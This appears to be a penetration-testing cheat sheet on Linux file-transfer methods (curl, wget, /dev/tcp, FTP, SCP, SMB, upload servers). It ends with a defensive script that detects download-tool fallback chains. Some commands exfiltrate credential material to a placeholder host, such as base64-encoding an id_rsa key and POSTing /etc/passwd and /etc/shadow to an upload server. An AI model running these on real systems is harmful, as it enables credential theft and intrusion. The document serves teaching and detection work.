Linux File Transfer Methods

Introduction

Linux provides many versatile tools for file transfers. Understanding these methods helps both attackers and defenders. Most malware uses HTTP/HTTPS for communication, though Linux also supports FTP, SMB, and other protocols.

Real-world example: Threat actors used a Bash script that attempted three download methods (cURL → wget → Python) to download malware via HTTP, demonstrating redundancy in file transfer methods.

Download Operations

Base64 Encoding / Decoding

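Suitable for small files when no network path is available for the transfer: encode the file on the source, copy the resulting string, and decode it on the target. Compare MD5 checksums on both sides to confirm the file arrived intact.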

On source machine:

md5sum id_rsa
cat id_rsa | base64 -w 0; echo

On target machine:

echo -n '<base64_string>' | base64 -d > id_rsa
md5sum id_rsa  # Verify hash matches

HTTP/HTTPS Downloads

Most common method. Multiple tools available with fallback options.

cURL:

curl http://<IP>/file.txt -o file.txt
curl https://<IP>/file.txt -k -o file.txt  # -k disables TLS certificate verification

wget:

wget http://<IP>/file.txt
wget --no-check-certificate https://<IP>/file.txt

Python:

python3 -c "import urllib.request; urllib.request.urlretrieve('http://<IP>/file.txt', 'file.txt')"

Bash (using /dev/tcp):

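exec 3<>/dev/tcp/<IP>/80
# HTTP/1.0 keeps the server from replying with chunked transfer encoding
printf 'GET /file.txt HTTP/1.0\r\nHost: <IP>\r\nConnection: close\r\n\r\n' >&3
# Drop the response headers (up to the first blank line) and save only the body
sed '1,/^\r$/d' <&3 > file.txt
exec 3>&-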

FTP Downloads

Interactive FTP:

ftp <IP>
# Then: get file.txt

Non-interactive FTP:

echo -e "open <IP>\nuser anonymous\nbinary\nget file.txt\nbye" | ftp -n

cURL FTP:

curl ftp://<IP>/file.txt -u anonymous: -o file.txt

SCP Downloads

Secure Copy Protocol over SSH (TCP/22). Requires SSH server on source.

Setup SSH server:

sudo systemctl enable ssh
sudo systemctl start ssh
netstat -lnpt  # Verify listening on port 22

Download from remote:

scp user@<IP>:/path/to/file.txt .
# With password prompt, or use SSH keys

Note: Create temporary user accounts for file transfers to avoid exposing primary credentials.

SMB Downloads

Install SMB client:

sudo apt install smbclient  # Debian/Ubuntu
sudo yum install samba-client  # RHEL/CentOS

Download file:

smbclient //<IP>/sharename -U username
# Then: get file.txt

Or non-interactive:

smbclient //<IP>/sharename -U username -c "get file.txt"

Upload Operations

Web Upload

Use Python’s uploadserver module for file uploads via HTTP/HTTPS.

Setup upload server (HTTP):

sudo python3 -m pip install --user uploadserver
python3 -m uploadserver 8000

Setup upload server (HTTPS):

# Create self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

# Start HTTPS server from a separate directory so server.pem (which holds the private key) is not served
mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

Upload from target:

# Single file
curl -X POST http://<IP>:8000/upload -F 'files=@/path/to/file'

# Multiple files
curl -X POST https://<IP>:443/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative Web File Transfer

Start a simple web server on the target machine, then download from the attacker machine.

Python3 HTTP server:

python3 -m http.server 8000
# Access from attacker: wget http://<IP>:8000/file.txt

Python2.7 HTTP server:

python2.7 -m SimpleHTTPServer 8000

PHP HTTP server:

php -S 0.0.0.0:8000

Ruby HTTP server:

ruby -run -ehttpd . -p8000

Note: Inbound traffic may be blocked. This method transfers from target to attacker (download from attacker’s perspective).

SCP Upload

If SSH (TCP/22) outbound is allowed, upload files to SSH server.

Upload to remote:

scp /etc/passwd user@<IP>:/home/user/
# Syntax similar to cp: scp <source> <destination>

Upload directory:

scp -r /path/to/directory user@<IP>:/home/user/

FTP Uploads

Setup FTP server:

sudo python3 -m pyftpdlib --port 21 --write

Upload with cURL:

curl -T file.txt ftp://<IP>/ --user anonymous:

Upload with FTP client:

echo -e "open <IP>\nuser anonymous\nbinary\nput file.txt\nbye" | ftp -n

SMB Uploads

Upload file:

smbclient //<IP>/sharename -U username -c "put file.txt"

Mount and copy:

sudo mkdir /mnt/smb
sudo mount -t cifs //<IP>/sharename /mnt/smb -o username=user
cp file.txt /mnt/smb/
sudo umount /mnt/smb

Summary

  • Base64: No network needed, limited by terminal/paste buffer size
  • HTTP/HTTPS: Most common, multiple tools (curl, wget, Python), often allowed outbound
  • FTP: Alternative protocol, requires server setup
  • SCP/SSH: Secure, requires SSH server, TCP/22 may be blocked outbound
  • SMB: Common in enterprise, may require authentication
  • Web servers: Python/PHP/Ruby can quickly serve files for download
  • Upload servers: Python uploadserver module for receiving files

Redundancy strategy: Try multiple methods (curl → wget → Python) for reliability.
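
From the defender's side, the curl → wget → Python fallback described in the introduction and above leaves a recognizable trace: one parent process running several different download tools against the same URL within seconds. The following is an added example, not code from the original page. The log format (timestamp, parent PID, command line), the sample records, the function name find_fallback_chains and the 60-second window are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records in an assumed format: "<timestamp> <ppid> <command line>"
SAMPLE_LOG = """\
2024-05-01T10:00:01 4121 curl -s http://198.51.100.7/a.sh -o /tmp/a.sh
2024-05-01T10:00:02 4121 wget -q http://198.51.100.7/a.sh -O /tmp/a.sh
2024-05-01T10:00:03 4121 python3 -c "import urllib.request; urllib.request.urlretrieve('http://198.51.100.7/a.sh', '/tmp/a.sh')"
2024-05-01T10:05:00 5000 curl -s https://example.org/index.html -o /tmp/index.html
2024-05-01T11:30:00 5000 /usr/bin/wget -q https://example.org/index.html
"""

TOOL_RE = re.compile(r"^(?:\S*/)?(curl|wget|python)[\d.]*(?=\s)")
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\"]+")

def find_fallback_chains(log_text, window=timedelta(seconds=60), min_tools=2):
    """Return (ppid, url, tools) for each parent process that ran at least
    `min_tools` different download tools against one URL within `window`."""
    events = defaultdict(list)  # (ppid, url) -> [(time, tool), ...]
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # skip malformed records
        ts, ppid, cmd = parts
        tool, url = TOOL_RE.match(cmd), URL_RE.search(cmd)
        if tool and url:
            events[(ppid, url.group(0))].append((datetime.fromisoformat(ts), tool.group(1)))
    alerts = []
    for (ppid, url), hits in events.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            tools = []  # distinct tools seen inside the window, in execution order
            for when, name in hits[i:]:
                if when - start <= window and name not in tools:
                    tools.append(name)
            if len(tools) >= min_tools:
                alerts.append((ppid, url, tools))
                break  # one alert per (parent, URL) pair
    return alerts

if __name__ == "__main__":
    for ppid, url, tools in find_fallback_chains(SAMPLE_LOG):
        print(f"ppid={ppid} url={url} chain={' -> '.join(tools)}")
```

The two example.org requests share a parent but are 85 minutes apart, so they fall outside the window and are not reported.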